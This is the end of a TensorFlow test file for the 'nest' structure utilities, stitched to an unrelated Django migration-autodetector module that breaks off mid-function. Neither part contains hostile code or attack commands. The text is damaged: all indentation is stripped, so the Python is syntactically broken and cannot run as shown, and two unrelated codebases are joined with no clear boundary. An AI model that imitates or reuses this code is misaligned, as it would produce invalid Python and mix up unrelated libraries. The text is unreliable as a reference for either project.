def testFlattenSparseValue(self):
st = sparse_tensor.SparseTensorValue([[0]], [0], [1])
single_value = st
list_of_values = [st, st, st]
nest_of_values = ((st), ((st), (st)))
dict_of_values = {"foo": st, "bar": st, "baz": st}
self.assertEqual([st], nest.flatten(single_value))
self.assertEqual([[st, st, st]], nest.flatten(list_of_values))
self.assertEqual([st, st, st], nest.flatten(nest_of_values))
self.assertEqual([st, st, st], nest.flatten(dict_of_values))
def testIsSequence(self):
self.assertFalse(nest.is_sequence("1234"))
self.assertFalse(nest.is_sequence([1, 3, [4, 5]]))
self.assertTrue(nest.is_sequence(((7, 8), (5, 6))))
self.assertFalse(nest.is_sequence([]))
self.assertFalse(nest.is_sequence(set([1, 2])))
ones = array_ops.ones([2, 3])
self.assertFalse(nest.is_sequence(ones))
self.assertFalse(nest.is_sequence(math_ops.tanh(ones)))
self.assertFalse(nest.is_sequence(np.ones((4, 5))))
self.assertTrue(nest.is_sequence({"foo": 1, "bar": 2}))
self.assertFalse(
nest.is_sequence(sparse_tensor.SparseTensorValue([[0]], [0], [1])))
def testAssertSameStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = ((("foo1", "foo2"), "foo3"), "foo4", ("foo5", "foo6"))
structure_different_num_elements = ("spam", "eggs")
structure_different_nesting = (((1, 2), 3), 4, 5, (6,))
nest.assert_same_structure(structure1, structure2)
nest.assert_same_structure("abc", 1.0)
nest.assert_same_structure("abc", np.array([0, 1]))
nest.assert_same_structure("abc", constant_op.constant([0, 1]))
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure(structure1, structure_different_num_elements)
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure((0, 1), np.array([0, 1]))
with self.assertRaisesRegexp(ValueError,
"don't have the same number of elements"):
nest.assert_same_structure(0, (0, 1))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(structure1, structure_different_nesting)
named_type_0 = collections.namedtuple("named_0", ("a", "b"))
named_type_1 = collections.namedtuple("named_1", ("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure, (0, 1),
named_type_0("a", "b"))
nest.assert_same_structure(named_type_0(3, 4), named_type_0("a", "b"))
self.assertRaises(TypeError, nest.assert_same_structure,
named_type_0(3, 4), named_type_1(3, 4))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(named_type_0(3, 4), named_type_0((3,), 4))
with self.assertRaisesRegexp(ValueError,
"don't have the same nested structure"):
nest.assert_same_structure(((3,), 4), (3, (4,)))
structure1_list = {"a": ((1, 2), 3), "b": 4, "c": (5, 6)}
with self.assertRaisesRegexp(TypeError,
"don't have the same sequence type"):
nest.assert_same_structure(structure1, structure1_list)
nest.assert_same_structure(structure1, structure2, check_types=False)
nest.assert_same_structure(structure1, structure1_list, check_types=False)
def testMapStructure(self):
structure1 = (((1, 2), 3), 4, (5, 6))
structure2 = (((7, 8), 9), 10, (11, 12))
structure1_plus1 = nest.map_structure(lambda x: x + 1, structure1)
nest.assert_same_structure(structure1, structure1_plus1)
self.assertAllEqual(
[2, 3, 4, 5, 6, 7],
nest.flatten(structure1_plus1))
structure1_plus_structure2 = nest.map_structure(
lambda x, y: x + y, structure1, structure2)
self.assertEqual(
(((1 + 7, 2 + 8), 3 + 9), 4 + 10, (5 + 11, 6 + 12)),
structure1_plus_structure2)
self.assertEqual(3, nest.map_structure(lambda x: x - 1, 4))
self.assertEqual(7, nest.map_structure(lambda x, y: x + y, 3, 4))
with self.assertRaisesRegexp(TypeError, "callable"):
nest.map_structure("bad", structure1_plus1)
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, 3, (3,))
with self.assertRaisesRegexp(TypeError, "same sequence type"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), {"a": (3, 4), "b": 5})
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)))
with self.assertRaisesRegexp(ValueError, "same nested structure"):
nest.map_structure(lambda x, y: None, ((3, 4), 5), (3, (4, 5)),
check_types=False)
with self.assertRaisesRegexp(ValueError, "Only valid keyword argument"):
nest.map_structure(lambda x: None, structure1, foo="a")
with self.assertRaisesRegexp(ValueError, "Only valid keyword argument"):
nest.map_structure(lambda x: None, structure1, check_types=False, foo="a")
def testAssertShallowStructure(self):
inp_ab = ("a", "b")
inp_abc = ("a", "b", "c")
expected_message = (
"The two structures don't have the same sequence length. Input "
"structure has length 2, while shallow structure has length 3.")
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_shallow_structure(inp_abc, inp_ab)
inp_ab1 = ((1, 1), (2, 2))
inp_ab2 = {"a": (1, 1), "b": (2, 2)}
expected_message = (
"The two structures don't have the same sequence type. Input structure "
"has type <(type|class) 'tuple'>, while shallow structure has type "
"<(type|class) 'dict'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
nest.assert_shallow_structure(inp_ab2, inp_ab1, check_types=False)
inp_ab1 = {"a": (1, 1), "b": {"c": (2, 2)}}
inp_ab2 = {"a": (1, 1), "b": {"d": (2, 2)}}
expected_message = (
r"The two structures don't have the same keys. Input "
r"structure has keys \['c'\], while shallow structure has "
r"keys \['d'\].")
with self.assertRaisesRegexp(ValueError, expected_message):
nest.assert_shallow_structure(inp_ab2, inp_ab1)
inp_ab = collections.OrderedDict([("a", 1), ("b", (2, 3))])
inp_ba = collections.OrderedDict([("b", (2, 3)), ("a", 1)])
nest.assert_shallow_structure(inp_ab, inp_ba)
def testFlattenUpTo(self):
input_tree = (((2, 2), (3, 3)), ((4, 9), (5, 5)))
shallow_tree = ((True, True), (False, True))
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [(2, 2), (3, 3), (4, 9), (5, 5)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
input_tree = ((("a", 1), (("b", 2), (("c", 3), (("d", 4))))))
shallow_tree = (("level_1", ("level_2", ("level_3", ("level_4")))))
input_tree_flattened_as_shallow_tree = nest.flatten_up_to(shallow_tree,
input_tree)
input_tree_flattened = nest.flatten(input_tree)
self.assertEqual(input_tree_flattened_as_shallow_tree,
[("a", 1), ("b", 2), ("c", 3), ("d", 4)])
self.assertEqual(input_tree_flattened, ["a", 1, "b", 2, "c", 3, "d", 4])
## Shallow non-list edge-case.
# Using iterable elements.
input_tree = ["input_tree"]
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = ("input_tree_0", "input_tree_1")
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = (0,)
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
input_tree = (0, 1)
shallow_tree = 9
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Both non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = "shallow_tree"
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
# Using non-iterable elements.
input_tree = 0
shallow_tree = 0
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [input_tree])
self.assertEqual(flattened_shallow_tree, [shallow_tree])
## Input non-list edge-case.
# Using iterable elements.
input_tree = "input_tree"
shallow_tree = ("shallow_tree",)
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'str'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
input_tree = "input_tree"
shallow_tree = ("shallow_tree_9", "shallow_tree_8")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
# Using non-iterable elements.
input_tree = 0
shallow_tree = (9,)
expected_message = ("If shallow structure is a sequence, input must also "
"be a sequence. Input has type: <(type|class) 'int'>.")
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
input_tree = 0
shallow_tree = (9, 8)
with self.assertRaisesRegexp(TypeError, expected_message):
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_shallow_tree, list(shallow_tree))
# Using dict.
input_tree = {"a": ((2, 2), (3, 3)), "b": ((4, 9), (5, 5))}
shallow_tree = {"a": (True, True), "b": (False, True)}
flattened_input_tree = nest.flatten_up_to(shallow_tree, input_tree)
flattened_shallow_tree = nest.flatten_up_to(shallow_tree, shallow_tree)
self.assertEqual(flattened_input_tree, [(2, 2), (3, 3), (4, 9), (5, 5)])
self.assertEqual(flattened_shallow_tree, [True, True, False, True])
def testMapStructureUpTo(self):
ab_tuple = collections.namedtuple("ab_tuple", "a, b")
op_tuple = collections.namedtuple("op_tuple", "add, mul")
inp_val = ab_tuple(a=2, b=3)
inp_ops = ab_tuple(a=op_tuple(add=1, mul=2), b=op_tuple(add=2, mul=3))
out = nest.map_structure_up_to(
inp_val, lambda val, ops: (val + ops.add) * ops.mul, inp_val, inp_ops)
self.assertEqual(out.a, 6)
self.assertEqual(out.b, 15)
data_list = ((2, 4, 6, 8), ((1, 3, 5, 7, 9), (3, 5, 7)))
name_list = ("evens", ("odds", "primes"))
out = nest.map_structure_up_to(
name_list, lambda name, sec: "first_{}_{}".format(len(sec), name),
name_list, data_list)
self.assertEqual(out, ("first_4_evens", ("first_5_odds", "first_3_primes")))
if __name__ == "__main__":
test.main()
|
|
from __future__ import unicode_literals
import datetime
import re
from itertools import chain
from django.conf import settings
from django.db import models
from django.db.migrations import operations
from django.db.migrations.migration import Migration
from django.db.migrations.operations.models import AlterModelOptions
from django.db.migrations.optimizer import MigrationOptimizer
from django.db.migrations.questioner import MigrationQuestioner
from django.utils import six
from .topological_sort import stable_topological_sort
class MigrationAutodetector(object):
"""
Takes a pair of ProjectStates, and compares them to see what the
first would need doing to make it match the second (the second
usually being the project's current state).
Note that this naturally operates on entire projects at a time,
as it's likely that changes interact (for example, you can't
add a ForeignKey without having a migration to add the table it
depends on first). A user interface may offer single-app usage
if it wishes, with the caveat that it may not always be possible.
"""
def __init__(self, from_state, to_state, questioner=None):
self.from_state = from_state
self.to_state = to_state
self.questioner = questioner or MigrationQuestioner()
self.existing_apps = {app for app, model in from_state.models}
def changes(self, graph, trim_to_apps=None, convert_apps=None, migration_name=None):
"""
Main entry point to produce a list of appliable changes.
Takes a graph to base names on and an optional set of apps
to try and restrict to (restriction is not guaranteed)
"""
changes = self._detect_changes(convert_apps, graph)
changes = self.arrange_for_graph(changes, graph, migration_name)
if trim_to_apps:
changes = self._trim_to_apps(changes, trim_to_apps)
return changes
def deep_deconstruct(self, obj):
"""
Recursive deconstruction for a field and its arguments.
Used for full comparison for rename/alter; sometimes a single-level
deconstruction will not compare correctly.
"""
if isinstance(obj, list):
return [self.deep_deconstruct(value) for value in obj]
elif isinstance(obj, tuple):
return tuple(self.deep_deconstruct(value) for value in obj)
elif isinstance(obj, dict):
return {
key: self.deep_deconstruct(value)
for key, value in obj.items()
}
elif isinstance(obj, type):
# If this is a type that implements 'deconstruct' as an instance method,
# avoid treating this as being deconstructible itself - see #22951
return obj
elif hasattr(obj, 'deconstruct'):
deconstructed = obj.deconstruct()
if isinstance(obj, models.Field):
# we have a field which also returns a name
deconstructed = deconstructed[1:]
path, args, kwargs = deconstructed
return (
path,
[self.deep_deconstruct(value) for value in args],
{
key: self.deep_deconstruct(value)
for key, value in kwargs.items()
},
)
else:
return obj
def only_relation_agnostic_fields(self, fields):
"""
Return a definition of the fields that ignores field names and
what related fields actually relate to.
Used for detecting renames (as, of course, the related fields
change during renames)
"""
fields_def = []
for name, field in sorted(fields):
deconstruction = self.deep_deconstruct(field)
if field.remote_field and field.remote_field.model:
del deconstruction[2]['to']
fields_def.append(deconstruction)
return fields_def
def _detect_changes(self, convert_apps=None, graph=None):
"""
Returns a dict of migration plans which will achieve the
change from from_state to to_state. The dict has app labels
as keys and a list of migrations as values.
The resulting migrations aren't specially named, but the names
do matter for dependencies inside the set.
convert_apps is the list of apps to convert to use migrations
(i.e. to make initial migrations for, in the usual case)
graph is an optional argument that, if provided, can help improve
dependency generation and avoid potential circular dependencies.
"""
# The first phase is generating all the operations for each app
# and gathering them into a big per-app list.
# We'll then go through that list later and order it and split
# into migrations to resolve dependencies caused by M2Ms and FKs.
self.generated_operations = {}
# Prepare some old/new state and model lists, separating
# proxy models and ignoring unmigrated apps.
self.old_apps = self.from_state.concrete_apps
self.new_apps = self.to_state.apps
self.old_model_keys = []
self.old_proxy_keys = []
self.old_unmanaged_keys = []
self.new_model_keys = []
self.new_proxy_keys = []
self.new_unmanaged_keys = []
for al, mn in sorted(self.from_state.models.keys()):
model = self.old_apps.get_model(al, mn)
if not model._meta.managed:
self.old_unmanaged_keys.append((al, mn))
elif al not in self.from_state.real_apps:
if model._meta.proxy and not model._meta.local_fields:
self.old_proxy_keys.append((al, mn))
else:
self.old_model_keys.append((al, mn))
for al, mn in sorted(self.to_state.models.keys()):
model = self.new_apps.get_model(al, mn)
if not model._meta.managed:
self.new_unmanaged_keys.append((al, mn))
elif (
al not in self.from_state.real_apps or
(convert_apps and al in convert_apps)
):
if model._meta.proxy and not model._meta.local_fields:
self.new_proxy_keys.append((al, mn))
else:
self.new_model_keys.append((al, mn))
# Renames have to come first
self.generate_renamed_models()
# Prepare lists of fields and generate through model map
self._prepare_field_lists()
self._generate_through_model_map()
# Generate non-rename model operations
self.generate_deleted_models()
self.generate_created_models()
self.generate_deleted_proxies()
self.generate_created_proxies()
self.generate_altered_options()
self.generate_altered_managers()
# Generate field operations
self.generate_renamed_fields()
self.generate_removed_fields()
self.generate_added_fields()
self.generate_altered_fields()
self.generate_altered_unique_together()
self.generate_altered_index_together()
self.generate_altered_db_table()
self.generate_altered_order_with_respect_to()
self._sort_migrations()
self._build_migration_list(graph)
self._optimize_migrations()
return self.migrations
def _prepare_field_lists(self):
"""
Prepare field lists, and prepare a list of the fields that used
through models in the old state so we can make dependencies
from the through model deletion to the field that uses it.
"""
self.kept_model_keys = set(self.old_model_keys).intersection(self.new_model_keys)
self.kept_proxy_keys = set(self.old_proxy_keys).intersection(self.new_proxy_keys)
self.kept_unmanaged_keys = set(self.old_unmanaged_keys).intersection(self.new_unmanaged_keys)
self.through_users = {}
self.old_field_keys = set()
self.new_field_keys = set()
for app_label, model_name in sorted(self.kept_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
new_model_state = self.to_state.models[app_label, model_name]
self.old_field_keys.update((app_label, model_name, x) for x, y in old_model_state.fields)
self.new_field_keys.update((app_label, model_name, x) for x, y in new_model_state.fields)
def _generate_through_model_map(self):
"""
Through model map generation
"""
for app_label, model_name in sorted(self.old_model_keys):
old_model_name = self.renamed_models.get((app_label, model_name), model_name)
old_model_state = self.from_state.models[app_label, old_model_name]
for field_name, field in old_model_state.fields:
old_field = self.old_apps.get_model(app_label, old_model_name)._meta.get_field(field_name)
if (hasattr(old_field, "remote_field") and getattr(old_field.remote_field, "through", None)
and not old_field.remote_field.through._meta.auto_created):
through_key = (
old_field.remote_field.through._meta.app_label,
old_field.remote_field.through._meta.model_name,
)
self.through_users[through_key] = (app_label, old_model_name, field_name)
def _build_migration_list(self, graph=None):
"""
We need to chop the lists of operations up into migrations with
dependencies on each other. We do this by stepping up an app's list of
operations until we find one that has an outgoing dependency that isn't
in another app's migration yet (hasn't been chopped off its list). We
then chop off the operations before it into a migration and move onto
the next app. If we loop back around without doing anything, there's a
circular dependency (which _should_ be impossible as the operations are
all split at this point so they can't depend and be depended on).
"""
self.migrations = {}
num_ops = sum(len(x) for x in self.generated_operations.values())
chop_mode = False
while num_ops:
# On every iteration, we step through all the apps and see if there
# is a completed set of operations.
# If we find that a subset of the operations are complete we can
# try to chop it off from the rest and continue, but we only
# do this if we've already been through the list once before
# without any chopping and nothing has changed.
for app_label in sorted(self.generated_operations.keys()):
chopped = []
dependencies = set()
for operation in list(self.generated_operations[app_label]):
deps_satisfied = True
operation_dependencies = set()
for dep in operation._auto_deps:
is_swappable_dep = False
if dep[0] == "__setting__":
# We need to temporarily resolve the swappable dependency to prevent
# circular references. While keeping the dependency checks on the
# resolved model we still add the swappable dependencies.
# See #23322
resolved_app_label, resolved_object_name = getattr(settings, dep[1]).split('.')
original_dep = dep
dep = (resolved_app_label, resolved_object_name.lower(), dep[2], dep[3])
is_swappable_dep = True
if dep[0] != app_label and dep[0] != "__setting__":
# External app dependency. See if it's not yet
# satisfied.
for other_operation in self.generated_operations.get(dep[0], []):
if self.check_dependency(other_operation, dep):
deps_satisfied = False
break
if not deps_satisfied:
break
else:
if is_swappable_dep:
operation_dependencies.add((original_dep[0], original_dep[1]))
elif dep[0] in self.migrations:
operation_dependencies.add((dep[0], self.migrations[dep[0]][-1].name))
else:
# If we can't find the other app, we add a first/last dependency,
# but only if we've already been through once and checked everything
if chop_mode:
# If the app already exists, we add a dependency on the last migration,
# as we don't know which migration contains the target field.
# If it's not yet migrated or has no migrations, we use __first__
if graph and graph.leaf_nodes(dep[0]):
operation_dependencies.add(graph.leaf_nodes(dep[0])[0])
else:
operation_dependencies.add((dep[0], "__first__"))
else:
deps_satisfied = False
if deps_satisfied:
chopped.append(operation)
dependencies.update(operation_dependencies)
self.generated_operations[app_label] = self.generated_operations[app_label][1:]
else:
break
# Make a migration! Well, only if there's stuff to put in it
if dependencies or chopped:
if not self.generated_operations[app_label] or chop_mode:
subclass = type(str("Migration"), (Migration,), {"operations": [], "dependencies": []})
instance = subclass("auto_%i" % (len(self.migrations.get(app_label, [])) + 1), app_label)
instance.dependencies = list(dependencies)
instance.operations = chopped
instance.initial = app_label not in self.existing_apps
self.migrations.setdefault(app_label, []).append(instance)
chop_mode = False
else:
self.generated_operations[app_label] = chopped + self.generated_operations[app_label]
new_num_ops = sum(len(x) for x in self.generated_operations.values())
if new_num_ops == num_ops:
if not chop_mode:
chop_mode = True
else:
raise ValueError("Cannot resolve operation dependencies: %r" % self.generated_operations)
num_ops = new_num_ops
def _sort_migrations(self):
"""
Reorder to make things possible. The order we have already isn't bad,
but we need to pull a few things around so FKs work nicely inside the
same app
"""
for app_label, ops in sorted(self.generated_operations.items()):
# construct a dependency graph for intra-app dependencies
dependency_graph = {op: set() for op in ops}
for op in ops:
for dep in op._auto_deps:
if dep[0] == app_label:
for op2 in ops:
if self.check_dependency(op2, dep):
dependency_graph[op].add(op2)
# we use a stable sort for deterministic tests & general behavior
self.generated_operations[app_label] = stable_topological_sort(ops, dependency_graph)
def _optimize_migrations(self):
# Add in internal dependencies among the migrations
for app_label, migrations in self.migrations.items():
for m1, m2 in zip(migrations, migrations[1:]):
m2.dependencies.append((app_label, m1.name))
# De-dupe dependencies
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.dependencies = list(set(migration.dependencies))
# Optimize migrations
for app_label, migrations in self.migrations.items():
for migration in migrations:
migration.operations = MigrationOptimizer().optimize(migration.operations, app_label=app_label)
def check_dependency(self, operation, dependency):
"""
Returns ``True`` if the given operation depends on the given dependency,
``False`` otherwise.
"""
# Created model
if dependency[2] is None and dependency[3] is True:
return (
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower()
)
# Created field
elif dependency[2] is not None and dependency[3] is True:
return (
(
isinstance(operation, operations.CreateModel) and
operation.name_lower == dependency[1].lower() and
any(dependency[2] == x for x, y in operation.fields)
) or
(
isinstance(operation, operations.AddField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
)
# Removed field
elif dependency[2] is not None and dependency[3] is False:
return (
isinstance(operation, operations.RemoveField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# Removed model
elif dependency[2] is None and dependency[3] is False:
return (
isinstance(operation, operations.DeleteModel) and
operation.name_lower == dependency[1].lower()
)
# Field being altered
elif dependency[2] is not None and dependency[3] == "alter":
return (
isinstance(operation, operations.AlterField) and
operation.model_name_lower == dependency[1].lower() and
operation.name_lower == dependency[2].lower()
)
# order_with_respect_to being unset for a field
elif dependency[2] is not None and dependency[3] == "order_wrt_unset":
return (
isinstance(operation, operations.AlterOrderWithRespectTo) and
operation.name_lower == dependency[1].lower() and
(operation.order_with_respect_to or "").lower() != dependency[2].lower()
)
# Field is removed and part of an index/unique_together
elif dependency[2] is not None and dependency[3] == "foo_together_change":
return (
isinstance(operation, (operations.AlterUniqueTogether,
operations.AlterIndexTogether)) and
operation.name_lower == dependency[1].lower()
)
# Unknown dependency. Raise an error.
else:
raise ValueError("Can't handle dependency %r" % (dependency, ))
def add_operation(self, app_label, operation, dependencies=None, beginning=False):
# Dependencies are (app_label, model_name, field_name, create/delete as True/False)
operation._auto_deps = dependencies or []
if beginning:
self.generated_operations.setdefault(app_label, []).insert(0, operation)
else:
self.generated_operations.setdefault(app_label, []).append(operation)
def swappable_first_key(self, item):
"""
Sorting key function that places potential swappable models first in
lists of created models (only real way to solve #22783)
"""
try:
model = self.new_apps.get_model(item[0], item[1])
base_names = [base.__name__ for base in model.__bases__]
string_version = "%s.%s" % (item[0], item[1])
if (
model._meta.swappable or
"AbstractUser" in base_names or
"AbstractBaseUser" in base_names or
settings.AUTH_USER_MODEL.lower() == string_version.lower()
):
return ("___" + item[0], "___" + item[1])
except LookupError:
pass
return item
def generate_renamed_models(self):
"""
Finds any renamed models, and generates the operations for them,
and removes the old entry from the model lists.
Must be run before other model-level generation.
"""
self.renamed_models = {}
self.renamed_models_rel = {}
added_models = set(self.new_model_keys) - set(self.old_model_keys)
for app_label, model_name in sorted(added_models):
model_state = self.to_state.models[app_label, model_name]
model_fields_def = self.only_relation_agnostic_fields(model_state.fields)
removed_models = set(self.old_model_keys) - set(self.new_model_keys)
for rem_app_label, rem_model_name in removed_models:
if rem_app_label == app_label:
rem_model_state = self.from_state.models[rem_app_label, rem_model_name]
rem_model_fields_def = self.only_relation_agnostic_fields(rem_model_state.fields)
if model_fields_def == rem_model_fields_def:
if self.questioner.ask_rename_model(rem_model_state, model_state):
self.add_operation(
app_label,
operations.RenameModel(
old_name=rem_model_state.name,
new_name=model_state.name,
)
)
self.renamed_models[app_label, model_name] = rem_model_name
self.renamed_models_rel['%s.%s' % (rem_model_state.app_label, rem_model_state.name)] = '%s.%s' % (model_state.app_label, model_state.name)
self.old_model_keys.remove((rem_app_label, rem_model_name))
self.old_model_keys.append((app_label, model_name))
break
def generate_created_models(self):
"""
Find all new models (both managed and unmanaged) and make create
operations for them as well as separate operations to create any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also defer any model options that refer to collections of fields
that might be deferred (e.g. unique_together, index_together).
"""
old_keys = set(self.old_model_keys).union(self.old_unmanaged_keys)
added_models = set(self.new_model_keys) - old_keys
added_unmanaged_models = set(self.new_unmanaged_keys) - old_keys
all_added_models = chain(
sorted(added_models, key=self.swappable_first_key, reverse=True),
sorted(added_unmanaged_models, key=self.swappable_first_key, reverse=True)
)
for app_label, model_name in all_added_models:
model_state = self.to_state.models[app_label, model_name]
model_opts = self.new_apps.get_model(app_label, model_name)._meta
# Gather related fields
related_fields = {}
primary_key_rel = None
for field in model_opts.local_fields:
if field.remote_field:
if field.remote_field.model:
if field.primary_key:
primary_key_rel = field.remote_field.model
elif not field.remote_field.parent_link:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model_opts.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Are there unique/index_together to defer?
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
order_with_respect_to = model_state.options.pop('order_with_respect_to', None)
# Depend on the deletion of any possible proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Depend on the other end of the primary key if it's a relation
if primary_key_rel:
dependencies.append((
primary_key_rel._meta.app_label,
primary_key_rel._meta.object_name,
None,
True
))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[d for d in model_state.fields if d[0] not in related_fields],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
dependencies=dependencies,
beginning=True,
)
# Don't add operations which modify the database for unmanaged models
if not model_opts.managed:
continue
# Generate operations for each related field
for name, field in sorted(related_fields.items()):
# Account for FKs to swappable models
swappable_setting = getattr(field, 'swappable_setting', None)
if swappable_setting is not None:
dep_app_label = "__setting__"
dep_object_name = swappable_setting
else:
dep_app_label = field.remote_field.model._meta.app_label
dep_object_name = field.remote_field.model._meta.object_name
dependencies = [(dep_app_label, dep_object_name, None, True)]
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
dependencies.append((
field.remote_field.through._meta.app_label,
field.remote_field.through._meta.object_name,
None,
True
))
# Depend on our own model being created
dependencies.append((app_label, model_name, None, True))
# Make operation
self.add_operation(
app_label,
operations.AddField(
model_name=model_name,
name=name,
field=field,
),
dependencies=list(set(dependencies)),
)
# Generate other opns
related_dependencies = [
(app_label, model_name, name, True)
for name, field in sorted(related_fields.items())
]
related_dependencies.append((app_label, model_name, None, True))
if unique_together:
self.add_operation(
app_label,
operations.AlterUniqueTogether(
name=model_name,
unique_together=unique_together,
),
dependencies=related_dependencies
)
if index_together:
self.add_operation(
app_label,
operations.AlterIndexTogether(
name=model_name,
index_together=index_together,
),
dependencies=related_dependencies
)
if order_with_respect_to:
self.add_operation(
app_label,
operations.AlterOrderWithRespectTo(
name=model_name,
order_with_respect_to=order_with_respect_to,
),
dependencies=[
(app_label, model_name, order_with_respect_to, True),
(app_label, model_name, None, True),
]
)
def generate_created_proxies(self):
"""
Makes CreateModel statements for proxy models.
We use the same statements as that way there's less code duplication,
but of course for proxy models we can skip all that pointless field
stuff and just chuck out an operation.
"""
added = set(self.new_proxy_keys) - set(self.old_proxy_keys)
for app_label, model_name in sorted(added):
model_state = self.to_state.models[app_label, model_name]
assert model_state.options.get("proxy")
# Depend on the deletion of any possible non-proxy version of us
dependencies = [
(app_label, model_name, None, False),
]
# Depend on all bases
for base in model_state.bases:
if isinstance(base, six.string_types) and "." in base:
base_app_label, base_name = base.split(".", 1)
dependencies.append((base_app_label, base_name, None, True))
# Generate creation operation
self.add_operation(
app_label,
operations.CreateModel(
name=model_state.name,
fields=[],
options=model_state.options,
bases=model_state.bases,
managers=model_state.managers,
),
# Depend on the deletion of any possible non-proxy version of us
dependencies=dependencies,
)
def generate_deleted_models(self):
"""
Find all deleted models (managed and unmanaged) and make delete
operations for them as well as separate operations to delete any
foreign key or M2M relationships (we'll optimize these back in later
if we can).
We also bring forward removal of any model options that refer to
collections of fields - the inverse of generate_created_models().
"""
new_keys = set(self.new_model_keys).union(self.new_unmanaged_keys)
deleted_models = set(self.old_model_keys) - new_keys
deleted_unmanaged_models = set(self.old_unmanaged_keys) - new_keys
all_deleted_models = chain(sorted(deleted_models), sorted(deleted_unmanaged_models))
for app_label, model_name in all_deleted_models:
model_state = self.from_state.models[app_label, model_name]
model = self.old_apps.get_model(app_label, model_name)
if not model._meta.managed:
# Skip here, no need to handle fields for unmanaged models
continue
# Gather related fields
related_fields = {}
for field in model._meta.local_fields:
if field.remote_field:
if field.remote_field.model:
related_fields[field.name] = field
# through will be none on M2Ms on swapped-out models;
# we can treat lack of through as auto_created=True, though.
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
for field in model._meta.local_many_to_many:
if field.remote_field.model:
related_fields[field.name] = field
if getattr(field.remote_field, "through", None) and not field.remote_field.through._meta.auto_created:
related_fields[field.name] = field
# Generate option removal first
unique_together = model_state.options.pop('unique_together', None)
index_together = model_state.options.pop('index_together', None)
if unique_together:
